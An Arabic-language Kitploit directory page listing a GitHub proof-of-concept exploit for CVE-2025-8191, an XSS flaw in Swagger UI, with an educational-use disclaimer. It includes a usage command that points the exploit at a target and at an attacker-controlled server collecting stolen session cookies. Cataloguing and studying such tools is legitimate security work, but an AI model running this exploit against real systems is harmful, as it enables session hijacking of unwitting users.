Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8191 — مستودع يحتوي على استغلال (PoC) لـ CVE‑2025‑8191 في واجهة Swagger UI، يستخدم حقن XSS لاستخراج ملفات تعريف الارتباط الخاصة بالجلسة. | Kitploit
أدوات/GitHubGitHub/bytereaper77/cve-2025-8191
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليمArchived
GitHubbytereaper77/cve-2025-8191

CVE-2025-8191

مستودع يحتوي على استغلال (PoC) لـ CVE‑2025‑8191 في واجهة Swagger UI، يستخدم حقن XSS لاستخراج ملفات تعريف الارتباط الخاصة بالجلسة.

عرض المستودع
21منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-8191 – حقن XSS في Swagger UI

الوصف :

يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال الثغرة CVE‑2025‑8191، وهي ثغرة وجدت في Swagger UI.

تسمح الثغرة بحقن Cross‑Site Scripting (XSS) في حقل “description”، مما يؤدي إلى تنفيذ سكربت عن بعد في إصدارات Swagger UI ≤ 1.0.3.

المراجع :

  • مدخل NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8191

الاستخدام :

root@kitploit:~
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v 

استبدل http://target.com بعنوان URL المستهدف لـ Swagger UI، و http://yourserver.com بمستمع HTTP الخاص بك لاستخراج البيانات.

إخلاء المسؤولية :

هذا الرمز مخصص للأغراض التعليمية والبحث الأمني فقط. لا تستخدمه على أنظمة ليس لديك إذن صريح لاستخدامه. المؤلف غير مسؤول عن أي إساءة استخدام.

الترخيص :

رخصة MIT

تنزيل الأداة